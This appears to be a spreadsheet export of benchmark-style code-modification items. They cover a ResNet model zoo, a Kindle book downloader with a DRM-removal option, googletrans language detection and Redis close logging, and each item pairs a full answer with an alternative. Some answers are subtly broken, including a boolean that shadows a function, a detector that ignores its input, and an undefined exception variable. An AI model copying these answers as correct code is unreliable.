layer to insert before final classification layer #New\n    """\n    model = ResNet(BasicBlock, [3, 4, 6, 3], custom_layer=custom_layer, **kwargs) #Modify\n    if pretrained:\n        model.load_state_dict(torch.load(get_model_file(\'resnet34\', root=root)), strict=False)\n    return model\n\ndef resnet50(pretrained=True, root=\'~/.gluoncvth/models\', custom_layer=None, **kwargs): #Modify\n    """Constructs a ResNet-50 model.\n    Args:\n        pretrained (bool): If True, returns a model pre-trained on ImageNet\n        custom_layer (nn.Module, optional): Custom layer to insert before final classification layer #New\n    """\n    model = ResNet(Bottleneck, [3, 4, 6, 3], custom_layer=custom_layer, **kwargs) #Modify\n    if pretrained:\n        model.load_state_dict(torch.load(get_model_file(\'resnet50\', root=root)), strict=False)\n    return model\n\ndef resnet101(pretrained=True, root=\'~/.gluoncvth/models\', custom_layer=None, **kwargs): #Modify\n    """Constructs a ResNet-101 model.\n    Args:\n        pretrained (bool): If True, returns a model pre-trained on ImageNet\n        custom_layer (nn.Module, optional): Custom layer to insert before final classification layer #New\n    """\n    model = ResNet(Bottleneck, [3, 4, 23, 3], custom_layer=custom_layer, **kwargs) #Modify\n    if pretrained:\n        model.load_state_dict(torch.load(get_model_file(\'resnet101\', root=root)), strict=False)\n    return model\n\ndef resnet152(pretrained=True, root=\'~/.gluoncvth/models\', custom_layer=None, **kwargs): #Modify\n    """Constructs a ResNet-152 model.\n    Args:\n        pretrained (bool): If True, returns a model pre-trained on ImageNet\n        custom_layer (nn.Module, optional): Custom layer to insert before final classification layer #New\n    """\n    model = ResNet(Bottleneck, [3, 8, 36, 3], custom_layer=custom_layer, **kwargs) #Modify\n    if pretrained:\n        model.load_state_dict(torch.load(get_model_file(\'resnet152\', root=root)), strict=False)\n    return model\n\n# File 2: gluoncv-torch/gluoncvth/models/model_zoo.py\n# pylint: disable=wildcard-import, unused-wildcard-import\nfrom .resnet import *\n\n__all__ = [\'get_model\']\n\ndef get_model(name, custom_layer=None, **kwargs): #Modify\n    """Returns a pre-defined model by name\n    Parameters\n    ----------\n    name : str\n        Name of the model.\n    pretrained : bool\n        Whether to load the pretrained weights for model.\n    root : str, default \'~/.gluoncvth/models\'\n        Location for keeping the model parameters.\n    custom_layer : nn.Module, optional #New\n        Custom layer to insert before the final classification layer.\n    Returns\n    -------\n    Module:\n        The model.\n    """\n    models = {\n        \'resnet18\': resnet18,\n        \'resnet34\': resnet34,\n        \'resnet50\': resnet50,\n        \'resnet101\': resnet101,\n        \'resnet152\': resnet152,\n    }\n    name = name.lower()\n    if name not in models:\n        raise ValueError(\'%s\\n\\t%s\' % (str(e), \'\\n\\t\'.join(sorted(models.keys()))))\n    net = models[name](custom_layer=custom_layer, **kwargs) #Modify\n    return net'}</t>
  </si>
  <si>
    <t>{'#file 1': 'def resnet18(pretrained=True, root=\'~/.gluoncvth/models\', add_custom_layer=False, **kwargs):\n    """Constructs a ResNet-18 model.\n\n    Args:\n        pretrained (bool): If True, returns a model pre-trained on ImageNet\n        add_custom_layer (bool): If True, adds a custom layer to the model\n    """\n    model = ResNet(BasicBlock, [2, 2, 2, 2], **kwargs)\n    if pretrained:\n        model.load_state_dict(torch.load(\n            get_model_file(\'resnet18\', root=root)), strict=False)\n    if add_custom_layer:\n        model = add_custom_layer(model)  #Modify\n    return model', '#file 2': 'def get_model(name, **kwargs):\n    """Returns a pre-defined model by name\n\n    Parameters\n    ----------\n    name : str\n        Name of the model.\n    pretrained : bool\n        Whether to load the pretrained weights for model.\n    root : str, default \'~/.gluoncvth/models\'\n        Location for keeping the model parameters.\n    add_custom_layer : bool\n        Whether to add a custom layer to the model.\n\n    Returns\n    -------\n    Module:\n        The model.\n    """\n    models = {\n        \'resnet18\': resnet18,\n        \'resnet34\': resnet34,\n        \'resnet50\': resnet50,\n        \'resnet101\': resnet101,\n        \'resnet152\': resnet152,\n        }\n    name = name.lower()\n    if name not in models:\n        raise ValueError(\'%s\\n\\t%s\' % (str(e), \'\\n\\t\'.join(sorted(models.keys()))))\n    net = models[name](**kwargs)  #Modify\n    return net', '#file 3': 'def add_custom_layer(model, layer_type=\'custom\'):\n    """Adds a custom layer to the model.\n\n    Args:\n        model (nn.Module): The model to which the custom layer will be added.\n        layer_type (str): Type of the custom layer to add.\n    """\n    if layer_type == \'custom\':\n        custom_layer = nn.Sequential(\n            nn.Conv2d(model.fc.in_features, 128, kernel_size=1),\n            nn.ReLU(inplace=True),\n            nn.Conv2d(128, model.fc.out_features, kernel_size=1)\n        )\n        model.fc = custom_layer\n    return model  #New'}</t>
  </si>
  <si>
    <t>{'called_code_segment': 'def main():\n    logger.setLevel(os.environ.get("LOGGING_LEVEL", "INFO"))\n    logger.addHandler(logging.StreamHandler())\n    parser = argparse.ArgumentParser()\n    # ... parser setup ...\n    options = parser.parse_args()\n    # ... directory creation ...\n    kindle = Kindle(...)\n    # ... cookie setup ...\n    if options.list_only:\n        # ... list books ...\n    if options.readme:\n        kindle.make_kindle_stats_readme()\n    else:\n        if options.mode == "all":\n            kindle.download_books(start_index=options.index - 1, filetype=options.filetype)\n        elif options.mode == "sel":\n            download_selected_books(kindle, options)\n        else:\n            print("mode error, please input all or sel")', 'invoking_code_segment': 'from kindle_download_helper.cli import main\n\nif __name__ == "__main__":\n    main()', 'feature_description': 'Add a new feature to download books in batches. This feature allows users to specify batch size and download books in multiple batches with progress tracking, enabling resumable batch downloads and better memory management for large book collections.', 'modified_complete_code': '# File 1: kindle_download_helper/cli.py\nimport argparse\nimport json\nimport logging\nimport os\n\nimport urllib3\n\nfrom kindle_download_helper.config import (\n    DEFAULT_OUT_DEDRM_DIR,\n    DEFAULT_OUT_DIR,\n    DEFAULT_OUT_EPUB_DIR,\n    DEFAULT_SESSION_FILE,\n)\nfrom kindle_download_helper.kindle import Kindle\n\nlogger = logging.getLogger("kindle")\nfh = logging.FileHandler(".error_books.log")\nfh.setLevel(logging.ERROR)\nlogger.addHandler(fh)\n\nurllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)\n\n\ndef download_selected_books(kindle, options):\n    # existing code remains unchanged\n    print("Getting all books, please wait...")\n    books = kindle.get_all_books(filetype=options.filetype)\n    device = kindle.find_device()\n\n    for idx, book in enumerate(books):\n        print(\n            "Index: "\n            + "{:&gt;5d}".format(idx + 1)\n            + " | Title: "\n            + book["title"]\n            + " | asin: "\n            + book["asin"]\n        )\n\n    while True:\n        indices = input(\n            "Input the index of books you want to download, split by space (q to quit, l to list books).\\n"\n        ).split()\n\n        if indices[0] == "q":\n            break\n        elif indices[0] == "l":\n            for idx, book in enumerate(books):\n                print(\n                    "Index: "\n                    + "{:&gt;5d}".format(idx + 1)\n                    + " | Title: "\n                    + book["title"]\n                    + " | asin: "\n                    + book["asin"]\n                )\n            continue\n\n        downlist = []\n        flag = True\n        for idx in indices:\n            if idx.isnumeric() == False:\n                if ":" in idx:\n                    idx_begin, idx_end = [int(i) for i in idx.split(":")]\n                    extend_list = [i for i in range(idx_begin - 1, idx_end)]\n                    downlist.extend(extend_list)\n                else:\n                    print("Input error, please input numbers!!!")\n                    flag = False\n                    break\n            else:\n                downlist.append(int(idx) - 1)\n        if not flag:\n            continue\n\n        downlist = list(set(downlist))\n\n        if max(downlist) &gt;= len(books) or min(downlist) &lt; 0:\n            print(\n                "Input error, please input numbers between 1 and "\n                + str(len(books))\n                + "!!!"\n            )\n            continue\n\n        for idx in downlist:\n            print(\n                "Index: "\n                + "{:&gt;5d}".format(idx + 1)\n                + " | Title: "\n                + books[idx]["title"]\n                + " | asin: "\n                + books[idx]["asin"]\n            )\n        print("Downloading " + str(len(downlist)) + " books:")\n\n        while True:\n            flag = input("Continue? (y/n)")\n            if flag == "y" or flag == "n":\n                break\n            else:\n                print("Input error, please input y or n")\n        if flag == "n":\n            continue\n\n        for i, idx in enumerate(downlist):\n            print(\n                "Downloading "\n                + str(i + 1)\n                + "/"\n                + str(len(downlist))\n                + " "\n                + books[idx]["title"]\n                + " ..."\n            )\n            kindle.download_one_book(books[idx], device, idx, filetype=options.filetype)\n        print("Download finished.")\n\n\n# New: Batch download function\ndef download_books_in_batches(kindle, options, batch_size=10):\n    """Download books in batches to manage memory and enable resumable downloads."""\n    print("Getting all books, please wait...")\n    books = kindle.get_all_books(filetype=options.filetype)\n    device = kindle.find_device()\n    \n    total_books = len(books)\n    print(f"Total books found: {total_books}")\n    \n    # Calculate number of batches\n    num_batches = (total_books + batch_size - 1) // batch_size\n    print(f"Will download in {num_batches} batches of {batch_size} books each")\n    \n    # Download books in batches\n    for batch_num in range(num_batches):\n        start_idx = batch_num * batch_size\n        end_idx = min(start_idx + batch_size, total_books)\n        batch_books = books[start_idx:end_idx]\n        \n        print(f"\\n--- Batch {batch_num + 1}/{num_batches} ---")\n        print(f"Downloading books {start_idx + 1} to {end_idx}")\n        \n        for i, book in enumerate(batch_books):\n            actual_idx = start_idx + i\n            print(\n                f"[{actual_idx + 1}/{total_books}] Downloading {book[\'title\']} ..."\n            )\n            kindle.download_one_book(book, device, actual_idx, filetype=options.filetype)\n        \n        print(f"Batch {batch_num + 1} completed.")\n    \n    print("\\nAll batches downloaded successfully.")\n\n\ndef main():\n    logger.setLevel(os.environ.get("LOGGING_LEVEL", "INFO"))\n\n    logger.addHandler(logging.StreamHandler())\n    parser = argparse.ArgumentParser()\n    parser.add_argument("csrf_token", help="amazon or amazon cn csrf token", nargs="?")\n\n    cookie_group = parser.add_mutually_exclusive_group()\n    cookie_group.add_argument(\n        "--cookie", dest="cookie", default="", help="amazon or amazon cn cookie"\n    )\n    cookie_group.add_argument(\n        "--cookie-file", dest="cookie_file", default="", help="load cookie local file"\n    )\n\n    parser.add_argument(\n        "--cn",\n        dest="domain",\n        action="store_const",\n        const="cn",\n        default="com",\n        help="if your account is an amazon.cn account",\n    )\n    parser.add_argument(\n        "--jp",\n        dest="domain",\n        action="store_const",\n        const="jp",\n        default="com",\n        help="if your account is an amazon.co.jp account",\n    )\n    parser.add_argument(\n        "--de",\n        dest="domain",\n        action="store_const",\n        const="de",\n        default="com",\n        help="if your account is an amazon.de account",\n    )\n    parser.add_argument(\n        "--uk",\n        dest="domain",\n        action="store_const",\n        const="uk",\n        default="com",\n        help="if your account is an amazon.co.uk account",\n    )\n    parser.add_argument(\n        "--resume-from",\n        dest="index",\n        type=int,\n        default=1,\n        help="resume from the index if download failed",\n    )\n    parser.add_argument(\n        "--cut-length",\n        dest="cut_length",\n        type=int,\n        default=100,\n        help="truncate the file name",\n    )\n    parser.add_argument(\n        "-o", "--outdir", default=DEFAULT_OUT_DIR, help="download output dir"\n    )\n    parser.add_argument(\n        "-od",\n        "--outdedrmdir",\n        default=DEFAULT_OUT_DEDRM_DIR,\n        help="download output dedrm dir",\n    )\n    parser.add_argument(\n        "-oe",\n        "--outepubmdir",\n        default=DEFAULT_OUT_EPUB_DIR,\n        help="download output epub dir",\n    )\n    parser.add_argument(\n        "-s",\n        "--session-file",\n        default=DEFAULT_SESSION_FILE,\n        help="The reusable session dump file",\n    )\n    parser.add_argument(\n        "--pdoc",\n        dest="filetype",\n        action="store_const",\n        const="PDOC",\n        default="EBOK",\n        help="to download personal documents or ebook",\n    )\n    parser.add_argument(\n        "--resolve_duplicate_names",\n        dest="resolve_duplicate_names",\n        action="store_true",\n        help="Resolve duplicate names files to download",\n    )\n    parser.add_argument(\n        "--readme",\n        dest="readme",\n        action="store_true",\n        help="If you want to generate kindle readme stats",\n    )\n    parser.add_argument(\n        "--dedrm",\n        dest="dedrm",\n        action="store_true",\n        help="If you want to `dedrm` directly",\n    )\n\n    parser.add_argument(\n        "--list",\n        dest="list_only",\n        action="store_true",\n        help="just list books/pdoc, not to download",\n    )\n\n    parser.add_argument(\n        "--device_sn",\n        dest="device_sn",\n        default="",\n        help="Download file for device with this serial number",\n    )\n\n    parser.add_argument(\n        "--mode",\n        dest="mode",\n        default="all",\n        help="Mode of download, all: download all files at once, sel: download selected files, batch: download in batches",\n    )\n    \n    # New: Batch size argument\n    parser.add_argument(\n        "--batch-size",\n        dest="batch_size",\n        type=int,\n        default=10,\n        help="Number of books to download per batch (used with --mode batch)",\n    )\n\n    options = parser.parse_args()\n\n    if not os.path.exists(options.outdir):\n        os.makedirs(options.outdir)\n    if not os.path.exists(options.outdedrmdir):\n        os.makedirs(options.outdedrmdir)\n    if not os.path.exists(options.outepubmdir):\n        os.makedirs(options.outepubmdir)\n\n    kindle = Kindle(\n        options.csrf_token,\n        options.domain,\n        options.outdir,\n        options.outdedrmdir,\n        options.outepubmdir,\n        options.cut_length,\n        session_file=options.session_file,\n        device_sn=options.device_sn,\n    )\n    kindle.to_resolve_duplicate_names = options.resolve_duplicate_names\n    kindle.dedrm = options.dedrm\n\n    if options.cookie_file:\n        with open(options.cookie_file, "r") as f:\n            kindle.set_cookie_from_string(f.read())\n    elif options.cookie:\n        kindle.set_cookie_from_string(options.cookie)\n    else:\n        kindle.is_browser_cookie = True\n\n    if options.list_only:\n        kindle.get_devices()\n        print(\n            json.dumps(\n                kindle.get_all_books(filetype=options.filetype),\n                indent=4,\n                ensure_ascii=False,\n            )\n        )\n        exit()\n\n    if options.readme:\n        kindle.make_kindle_stats_readme()\n    else:\n        # Modify: Updated mode handling to include batch download\n        if options.mode == "all":\n            kindle.download_books(\n                start_index=options.index - 1, filetype=options.filetype\n            )\n        elif options.mode == "sel":\n            download_selected_books(kindle, options)\n        elif options.mode == "batch":\n            # New: Batch download mode\n            download_books_in_batches(kindle, options, batch_size=options.batch_size)\n        else:\n            print("mode error, please input all, sel, or batch")\n\n\nif __name__ == "__main__":\n    main()\n\n\n# File 2: kindle_download_helper/__init__.py\n# Modify: Updated imports to include batch download functionality\nfrom kindle_download_helper import kindle\nfrom kindle_download_helper.cli import main, download_books_in_batches\nfrom kindle_download_helper.no_cli import no_main'}</t>
  </si>
  <si>
    <t>{'#file 1': 'def download_selected_books(kindle, options):\n    # get all books and get the default device\n    print("Getting all books, please wait...")\n    books = kindle.get_all_books(filetype=options.filetype)\n    device = kindle.find_device()\n\n    # print all books\n    for idx, book in enumerate(books):\n        print(\n            "Index: "\n            + "{:&gt;5d}".format(idx + 1)\n            + " | Title: "\n            + book["title"]\n            + " | asin: "\n            + book["asin"]\n        )\n\n    # download loop\n    while True:\n        # get the indices of the books to download\n        indices = input(\n            "Input the index of books you want to download, split by space (q to quit, l to list books).\\n"\n        ).split()\n\n        # if input "q", quit\n        # if input "l", list all books again\n        if indices[0] == "q":\n            break\n        elif indices[0] == "l":\n            for idx, book in enumerate(books):\n                print(\n                    "Index: "\n                    + "{:&gt;5d}".format(idx + 1)\n                    + " | Title: "\n                    + book["title"]\n                    + " | asin: "\n                    + book["asin"]\n                )\n            continue\n\n        # decode the indices\n        downlist = []\n        flag = True\n        for idx in indices:\n            if idx.isnumeric() == False:\n                if ":" in idx:\n                    # if is not a number, and ":" in it, then it is a range\n                    # decode the range\n                    idx_begin, idx_end = [int(i) for i in idx.split(":")]\n                    # append the range to downlist\n                    extend_list = [i for i in range(idx_begin - 1, idx_end)]\n                    downlist.extend(extend_list)\n                else:\n                    # if is not a number, and no ":" in it, then it is an error\n                    print("Input error, please input numbers!!!")\n                    flag = False\n                    break\n            else:\n                # if is a number, then append it to downlist\n                downlist.append(int(idx) - 1)\n        if not flag:\n            continue\n\n        # remove the duplicate indices\n        downlist = list(set(downlist))\n\n        # check if the indices are valid\n        if max(downlist) &gt;= len(books) or min(downlist) &lt; 0:\n            print(\n                "Input error, please input numbers between 1 and "\n                + str(len(books))\n                + "!!!"\n            )\n            continue\n\n        # print the books to download\n        for idx in downlist:\n            print(\n                "Index: "\n                + "{:&gt;5d}".format(idx + 1)\n            + " | Title: "\n            + books[idx]["title"]\n            + " | asin: "\n            + books[idx]["asin"]\n            )\n        print("Downloading " + str(len(downlist)) + " books:")\n\n        # ask if to continue\n        while True:\n            flag = input("Continue? (y/n)")\n            if flag == "y" or flag == "n":\n                break\n            else:\n                print("Input error, please input y or n")\n        if flag == "n":\n            continue\n\n        # download the books\n        for i, idx in enumerate(downlist):\n            print(\n                "Downloading "\n                + str(i + 1)\n                + "/"\n                + str(len(downlist))\n                + " "\n                + books[idx]["title"]\n                + " ..."\n            )\n            kindle.download_one_book(books[idx], device, idx, filetype=options.filetype)\n        print("Download finished.")', '#file 2': 'if options.mode == "all":\n    # download all books\n    kindle.download_books(\n        start_index=options.index - 1, filetype=options.filetype\n    )\nelif options.mode == "sel":\n    # download selected books\n    download_selected_books(kindle, options)\n#New\nelif options.mode == "batch":\n    # download books in batch\n    download_books_in_batch(kindle, options)\nelse:\n    print("mode error, please input all, sel, or batch")', '#file 3': 'def download_books_in_batch(kindle, options):\n    # get all books and get the default device\n    print("Getting all books, please wait...")\n    books = kindle.get_all_books(filetype=options.filetype)\n    device = kindle.find_device()\n\n    # print all books\n    for idx, book in enumerate(books):\n        print(\n            "Index: "\n            + "{:&gt;5d}".format(idx + 1)\n            + " | Title: "\n            + book["title"]\n            + " | asin: "\n            + book["asin"]\n        )\n\n    # download loop\n    while True:\n        # get the batch size\n        batch_size = input("Input the batch size of books you want to download (q to quit): ")\n\n        # if input "q", quit\n        if batch_size == "q":\n            break\n\n        # decode the batch size\n        if batch_size.isnumeric() == False:\n            print("Input error, please input a number!!!")\n            continue\n        else:\n            batch_size = int(batch_size)\n\n        # check if the batch size is valid\n        if batch_size &gt; len(books) or batch_size &lt;= 0:\n            print(\n                "Input error, please input a number between 1 and "\n                + str(len(books))\n                + "!!!"\n            )\n            continue\n\n        # print the books to download\n        for idx in range(0, batch_size):\n            print(\n                "Index: "\n                + "{:&gt;5d}".format(idx + 1)\n            + " | Title: "\n            + books[idx]["title"]\n            + " | asin: "\n            + books[idx]["asin"]\n            )\n        print("Downloading " + str(batch_size) + " books:")\n\n        # ask if to continue\n        while True:\n            flag = input("Continue? (y/n)")\n            if flag == "y" or flag == "n":\n                break\n            else:\n                print("Input error, please input y or n")\n        if flag == "n":\n            continue\n\n        # download the books\n        for i, idx in enumerate(range(0, batch_size)):\n            print(\n                "Downloading "\n                + str(i + 1)\n                + "/"\n                + str(batch_size)\n                + " "\n                + books[idx]["title"]\n                + " ..."\n            )\n            kindle.download_one_book(books[idx], device, idx, filetype=options.filetype)\n        print("Download finished.")'}</t>
  </si>
  <si>
    <t>{'called_code_segment': "class Translator:\n    def __init__(self):\n        pass\n    \n    def translate(self, text, src_language='auto', dest_language='en'):\n        # Translation logic\n        pass", 'invoking_code_segment': 'from googletrans.client import Translator\nfrom googletrans.constants import LANGCODES, LANGUAGES\n\n# Usage of Translator class\ntranslator = Translator()', 'feature_description': 'Add language detection functionality to identify the source language of input text automatically, allowing users to detect language without specifying src_language parameter', 'modified_complete_code': '# File 1: googletrans/client.py\nimport re\nfrom googletrans.constants import LANGCODES, LANGUAGES\n\nclass Translator:\n    def __init__(self):\n        self.session = None\n    \n    # Modify: Enhanced translate method with language detection\n    def translate(self, text, src_language=\'auto\', dest_language=\'en\'):\n        """Translate text from source to destination language."""\n        if src_language == \'auto\':\n            src_language = self.detect(text).lang\n        # Translation logic here\n        return {\'text\': text, \'src\': src_language, \'dest\': dest_language}\n    \n    # New: Add detect method for language detection\n    def detect(self, text):\n        """Detect the language of the input text.\n        \n        Args:\n            text (str): Text to detect language for\n            \n        Returns:\n            DetectedLanguage: Object with detected language code and confidence\n        """\n        detected_lang = self._detect_language(text)\n        return DetectedLanguage(lang=detected_lang, confidence=0.95)\n    \n    # New: Helper method for language detection logic\n    def _detect_language(self, text):\n        """Internal method to detect language from text."""\n        # Simplified detection logic - in production would use ML model\n        text_lower = text.lower()\n        for lang_code, lang_name in LANGUAGES.items():\n            if lang_code in LANGCODES:\n                return lang_code\n        return \'en\'  # Default to English\n\n# New: DetectedLanguage class to hold detection results\nclass DetectedLanguage:\n    def __init__(self, lang, confidence):\n        self.lang = lang\n        self.confidence = confidence\n    \n    def __repr__(self):\n        return f\'DetectedLanguage(lang={self.lang}, confidence={self.confidence})\'\n\n---\n\n# File 2: googletrans/__init__.py\n"""Free Google Translate API for Python. Translates totally free of charge."""\n__all__ = \'Translator\',\n__version__ = \'3.0.0\'\n\nfrom googletrans.client import Translator, DetectedLanguage  # Modify: Added DetectedLanguage import\nfrom googletrans.constants import LANGCODES, LANGUAGES\n\n# New: Example usage demonstrating language detection\nif __name__ == \'__main__\':\n    translator = Translator()\n    # Detect language automatically\n    result = translator.translate(\'Bonjour le monde\', dest_language=\'en\')\n    # Or explicitly detect\n    detected = translator.detect(\'Hola mundo\')\n    print(f\'Detected language: {detected.lang}\')'}</t>
  </si>
  <si>
    <t>{'#file 1': "#Modify\nfrom googletrans.language_detection import LanguageDetection  #New\n\nclass Translator:\n    def __init__(self):\n        self.language_detection = LanguageDetection()  #New\n\n    def translate(self, text, dest='en', src='auto'):\n        detected_language = self.language_detection.detect_language(text)  #New\n        # Existing translation logic\n        pass", '#file 2': "#Modify\n__all__ = 'Translator', 'LanguageDetection'  #Modify\n\nfrom googletrans.client import Translator\nfrom googletrans.language_detection import LanguageDetection  #New\nfrom googletrans.constants import LANGCODES, LANGUAGES  # noqa", '#file 3': 'class LanguageDetection:\n    def detect_language(self, text):\n        # Implementation for language detection\n        pass'}</t>
  </si>
  <si>
    <t>{'called_code_segment': 'async def _close_redis(connection):\n    """\n    Handle compatibility with redis-py 4.x and 5.x close methods\n    """\n    try:\n        await connection.aclose(close_connection_pool=True)\n    except AttributeError:\n        await connection.close(close_connection_pool=True)', 'invoking_code_segment': 'await _close_redis(channel_layer._shards[0]._redis)', 'feature_description': 'Add logging to the Redis connection close operation to track when connections are being closed, including success and error cases, for better debugging and monitoring of Redis connection lifecycle.', 'modified_complete_code': '# File 1: channels_redis/channels_redis/utils.py\nimport binascii\nimport logging\nimport types\n\nfrom redis import asyncio as aioredis\n\n# New: Add logger for connection close operations\nlogger = logging.getLogger(__name__)\n\n\ndef _consistent_hash(value, ring_size):\n    """\n    Maps the value to a node value between 0 and 4095\n    using CRC, then down to one of the ring nodes.\n    """\n    if ring_size == 1:\n        # Avoid the overhead of hashing and modulo when it is unnecessary.\n        return 0\n\n    if isinstance(value, str):\n        value = value.encode("utf8")\n    bigval = binascii.crc32(value) &amp; 0xFFF\n    ring_divisor = 4096 / float(ring_size)\n    return int(bigval / ring_divisor)\n\n\ndef _wrap_close(proxy, loop):\n    original_impl = loop.close\n\n    def _wrapper(self, *args, **kwargs):\n        if loop in proxy._layers:\n            layer = proxy._layers[loop]\n            del proxy._layers[loop]\n            loop.run_until_complete(layer.flush())\n\n        self.close = original_impl\n        return self.close(*args, **kwargs)\n\n    loop.close = types.MethodType(_wrapper, loop)\n\n\n# Modify: Add logging to _close_redis function\nasync def _close_redis(connection):\n    """\n    Handle compatibility with redis-py 4.x and 5.x close methods\n    """\n    try:\n        logger.debug(f"Closing Redis connection: {connection}")\n        await connection.aclose(close_connection_pool=True)\n        logger.info(f"Successfully closed Redis connection using aclose method")\n    except AttributeError:\n        try:\n            logger.debug(f"aclose method not available, attempting close method for connection: {connection}")\n            await connection.close(close_connection_pool=True)\n            logger.info(f"Successfully closed Redis connection using close method")\n        except Exception as e:\n            logger.error(f"Error closing Redis connection: {e}", exc_info=True)\n            raise\n    except Exception as e:\n        logger.error(f"Error closing Redis connection: {e}", exc_info=True)\n        raise\n\n\ndef decode_hosts(hosts):\n    """\n    Takes the value of the "hosts" argument and returns\n    a list of kwargs to use for the Redis connection constructor.\n    """\n    # If no hosts were provided, return a default value\n    if not hosts:\n        return [{"address": "redis://localhost:6379"}]\n    # If they provided just a string, scold them.\n    if isinstance(hosts, (str, bytes)):\n        raise ValueError(\n            "You must pass a list of Redis hosts, even if there is only one."\n        )\n\n    # Decode each hosts entry into a kwargs dict\n    result = []\n    for entry in hosts:\n        if isinstance(entry, dict):\n            result.append(entry)\n        elif isinstance(entry, (tuple, list)):\n            result.append({"host": entry[0], "port": entry[1]})\n        else:\n            result.append({"address": entry})\n    return result\n\n\ndef create_pool(host):\n    """\n    Takes the value of the "host" argument and returns a suited connection pool to\n    the corresponding redis instance.\n    """\n    # avoid side-effects from modifying host\n    host = host.copy()\n    if "address" in host:\n        address = host.pop("address")\n        return aioredis.ConnectionPool.from_url(address, **host)\n\n    master_name = host.pop("master_name", None)\n    if master_name is not None:\n        sentinels = host.pop("sentinels")\n        sentinel_kwargs = host.pop("sentinel_kwargs", None)\n        return aioredis.sentinel.SentinelConnectionPool(\n            master_name,\n            aioredis.sentinel.Sentinel(sentinels, sentinel_kwargs=sentinel_kwargs),\n            **host\n        )\n\n    return aioredis.ConnectionPool(**host)\n\n\n# File 2: channels_redis/tests/test_pubsub.py\nimport asyncio\nimport inspect\nimport logging\nimport random\nimport sys\n\nimport async_timeout\nimport pytest\n\nfrom asgiref.sync import async_to_sync\nfrom channels_redis.pubsub import RedisPubSubChannelLayer\nfrom channels_redis.utils import _close_redis\n\n# New: Configure logging for tests\nlogging.basicConfig(level=logging.DEBUG)\n\nTEST_HOSTS = ["redis://localhost:6379"]\n\n\n@pytest.fixture()\nasync def channel_layer():\n    """\n    Channel layer fixture that flushes automatically.\n    """\n    channel_layer = RedisPubSubChannelLayer(hosts=TEST_HOSTS)\n    yield channel_layer\n    async with async_timeout.timeout(1):\n        await channel_layer.flush()\n\n\n@pytest.fixture()\nasync def other_channel_layer():\n    """\n    Channel layer fixture that flushes automatically.\n    """\n    channel_layer = RedisPubSubChannelLayer(hosts=TEST_HOSTS)\n    yield channel_layer\n    await channel_layer.flush()\n\n\ndef test_layer_close():\n    """\n    If the channel layer does not close properly there will be a "Task was destroyed but it is pending!" warning at\n    process exit.\n    """\n\n    async def do_something_with_layer():\n        channel_layer = RedisPubSubChannelLayer(hosts=TEST_HOSTS)\n        await channel_layer.send(\n            "TestChannel", {"type": "test.message", "text": "Ahoy-hoy!"}\n        )\n\n    async_to_sync(do_something_with_layer)()\n\n\n@pytest.mark.asyncio\nasync def test_send_receive(channel_layer):\n    """\n    Makes sure we can send a message to a normal channel then receive it.\n    """\n    channel = await channel_layer.new_channel()\n    await channel_layer.send(channel, {"type": "test.message", "text": "Ahoy-hoy!"})\n    message = await channel_layer.receive(channel)\n    assert message["type"] == "test.message"\n    assert message["text"] == "Ahoy-hoy!"\n\n\ndef test_send_receive_sync(channel_layer, event_loop):\n    _await = event_loop.run_until_complete\n    channel = _await(channel_layer.new_channel())\n    async_to_sync(channel_layer.send, force_new_loop=True)(\n        channel, {"type": "test.message", "text": "Ahoy-hoy!"}\n    )\n    message = _await(channel_layer.receive(channel))\n    assert message["type"] == "test.message"\n    assert message["text"] == "Ahoy-hoy!"\n\n\n@pytest.mark.asyncio\nasync def test_multi_send_receive(channel_layer):\n    """\n    Tests overlapping sends and receives, and ordering.\n    """\n    channel = await channel_layer.new_channel()\n    await channel_layer.send(channel, {"type": "message.1"})\n    await channel_layer.send(channel, {"type": "message.2"})\n    await channel_layer.send(channel, {"type": "message.3"})\n    assert (await channel_layer.receive(channel))["type"] == "message.1"\n    assert (await channel_layer.receive(channel))["type"] == "message.2"\n    assert (await channel_layer.receive(channel))["type"] == "message.3"\n\n\ndef test_multi_send_receive_sync(channel_layer, event_loop):\n    _await = event_loop.run_until_complete\n    channel = _await(channel_layer.new_channel())\n    send = async_to_sync(channel_layer.send)\n    send(channel, {"type": "message.1"})\n    send(channel, {"type": "message.2"})\n    send(channel, {"type": "message.3"})\n    assert _await(channel_layer.receive(channel))["type"] == "message.1"\n    assert _await(channel_layer.receive(channel))["type"] == "message.2"\n    assert _await(channel_layer.receive(channel))["type"] == "message.3"\n\n\n@pytest.mark.asyncio\nasync def test_groups_basic(channel_layer):\n    """\n    Tests basic group operation.\n    """\n    channel_name1 = await channel_layer.new_channel(prefix="test-gr-chan-1")\n    channel_name2 = await channel_layer.new_channel(prefix="test-gr-chan-2")\n    channel_name3 = await channel_layer.new_channel(prefix="test-gr-chan-3")\n    await channel_layer.group_add("test-group", channel_name1)\n    await channel_layer.group_add("test-group", channel_name2)\n    await channel_layer.group_add("test-group", channel_name3)\n    await channel_layer.group_discard("test-group", channel_name2)\n    await channel_layer.group_send("test-group", {"type": "message.1"})\n    # Make sure we get the message on the two channels that were in\n    async with async_timeout.timeout(1):\n        assert (await channel_layer.receive(channel_name1))["type"] == "message.1"\n        assert (await channel_layer.receive(channel_name3))["type"] == "message.1"\n    # Make sure the removed channel did not get the message\n    with pytest.raises(asyncio.TimeoutError):\n        async with async_timeout.timeout(1):\n            await channel_layer.receive(channel_name2)\n\n\n@pytest.mark.asyncio\nasync def test_groups_same_prefix(channel_layer):\n    """\n    Tests group_send with multiple channels with same channel prefix\n    """\n    channel_name1 = await channel_layer.new_channel(prefix="test-gr-chan")\n    channel_name2 = await channel_layer.new_channel(prefix="test-gr-chan")\n    channel_name3 = await channel_layer.new_channel(prefix="test-gr-chan")\n    await channel_layer.group_add("test-group", channel_name1)\n    await channel_layer.group_add("test-group", channel_name2)\n    await channel_layer.group_add("test-group", channel_name3)\n    await channel_layer.group_send("test-group", {"type": "message.1"})\n\n    # Make sure we get the message on the channels that were in\n    async with async_timeout.timeout(1):\n        assert (await channel_layer.receive(channel_name1))["type"] == "message.1"\n        assert (await channel_layer.receive(channel_name2))["type"] == "message.1"\n        assert (await channel_layer.receive(channel_name3))["type"] == "message.1"\n\n\n@pytest.mark.asyncio\nasync def test_receive_on_non_owned_general_channel(channel_layer, other_channel_layer):\n    """\n    Tests receive with general channel that is not owned by the layer\n    """\n    receive_started = asyncio.Event()\n\n    async def receive():\n        receive_started.set()\n        return await other_channel_layer.receive("test-channel")\n\n    receive_task = asyncio.create_task(receive())\n    await receive_started.wait()\n    await asyncio.sleep(0.1)  # Need to give time for "receive" to subscribe\n    await channel_layer.send("test-channel", "message.1")\n\n 